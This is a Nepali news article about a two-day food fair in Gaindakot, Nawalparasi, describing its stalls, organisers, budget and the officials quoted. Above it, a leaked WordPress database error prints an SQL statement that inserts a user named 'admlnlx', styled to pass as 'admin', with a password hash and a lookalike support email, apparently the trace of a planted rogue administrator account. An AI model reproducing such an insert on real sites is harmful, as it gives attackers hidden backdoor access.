WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BaKibBd9NQrMXEm66/Eu4hWRGMNtoo1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 01:58:26', '', 'admlnlx', 'admlnlx')
गैंडाकोट, माघ १८–
नवलपरासीको गैंडाकोटस्थित नारायणी नदी किनारमा खाद्य मेला हुने भएको छ । यही माघ २१ गतेदेखि सुरु हुने दुईदिने खाद्य मेलाको तयारी तीब्र भइरहेको आयोजक क्षेत्रीय खाद्य प्रविधि तथा गुण नियन्त्रण कार्यालयले जानकारी दिएको छ ।
मंगलबार पत्रकार सम्मेलनको आयोजना गरि प्रदर्शनी स्थल नारायणी नदी किनारमा आयोजना हुन लागेको मेलामा स्थानीय घरेलु तथा साना उद्योगका उत्पादन प्रदर्शनका लागि ६० भन्दाबढी स्टल रहने जानकारी दिईयो । परम्परागत खानालाई व्यसायिकरण गर्न सकिने सम्भावनालाई मेलामा प्रदर्शनको रुपमा राखिने मेला संयोजक एवं उद्योग बाणिज्य संघ गैंडाकोटका उपाध्यक्ष दीपक सापकोटाले जानकारी दिनुभयो । उहाँका अनुसार परम्परागत खानाको विकास गर्ने उद्देश्यले आयोजना गर्न लागिएको मेलामा स्थानीय घरेल तथा साना उद्योगको उत्पादनलाई प्राथमिकता दिइने संयोजक सापकोटाले बताउनुभयो । गतवर्षदेखि नेपाल सरकारले निजी क्षेत्रसँग सहकार्य गरेर मेला आयोजना गर्न लागेको क्षेत्रीय खाद्य प्रविधि तथा गुण नियन्त्रण कार्यालयका प्रमुख हस्तबहादुर राईले जानकारी दिनुभयो ।
मेला नेपाल सरकार कृषि विकास मन्त्रालय खाद्य प्रविधि तथा गुण नियन्त्रण कार्यालय भैरहवा, रुपन्देहीले आयोजना गर्न लागेको हो । राईका अनुसार नेपालीहरुको खानेबानीलाई परिवर्तन गर्न मेलाले सहयोग पुग्ने बताउनुभयो । उहाँका अनुसार धान, मकै, गहुँ, कोदो नेपाली उत्पादनले नै पुग्ने अवस्था भएपनि नेपालीले खान नजानेका कारण नेपाली उत्पादनले नपुगेर अन्य तेस्रो मुलुकबाट ल्याउनुपरेको छ ।
मेलामा पोषणको विषयमा समेत सर्वसाधरणलाई जानकारी दिइनेछ । कुल १५ लाख रुपैयाँ खर्च लाग्ने अनुमान गरिएको मेलामा स्थानीय जातजातिका खानाका परिकारसँगै च्याउ, केरा, जुस, हिमालय क्षेत्रका उत्पादन, मौरीको उत्पादन, दुग्ध, नुन, उखु, चियापति, सिस्नुको पाउण्डर, लेकाली उत्पादन, आलु लगायत झण्डै ६० वटा भन्दाबढी घरेलु तथा साना उद्योगका उत्पादनको स्टल रहने आयोजकले जानकारी दिएको छ । मेला अवलोकन निःशुल्क गर्न सकिनेछ भने मेलामा स्टल लिएबापत आयोजकले उल्टै स्टलवालालाई दैनिक एकहजार रुपैयाँ समेत प्रोत्साहन भत्ता स्वरुप प्रदान गर्ने छ । मेला परिसरमा थारु समुदायको २ वटा होम स्टेको घर समेत देख्न पाइनेछ । यसअघि गतवर्ष लम्जुङमा खाद्य मेला आयोजना गरिएको थियो । यस्तो खालको मेलाले स्थानीय उत्पादनलाई प्रवद्र्धन गर्नमा टेवा पूग्ने उद्योग बाणिज्य संघ गैंडाकोटका अध्यक्ष अमृत भट्टचनले बताउनुभयो । नवलपरासी पर्यटकीय क्षेत्र भएकाले पनि यस्तो खालको गतिविधि जिल्लामा भइरहनुपर्नेमा उहाँले जोड दिनुभयो ।
उद्योग बाणिज्य संघ गैंडाकोट सहआयोजक रहेको मेलाको पत्रकार सम्मेलनमा नेपाल पत्रकार महासंघ चितवनका अध्यक्ष हरिप्रसाद पोखरेल लगायतले बोल्नुभएको थियो ।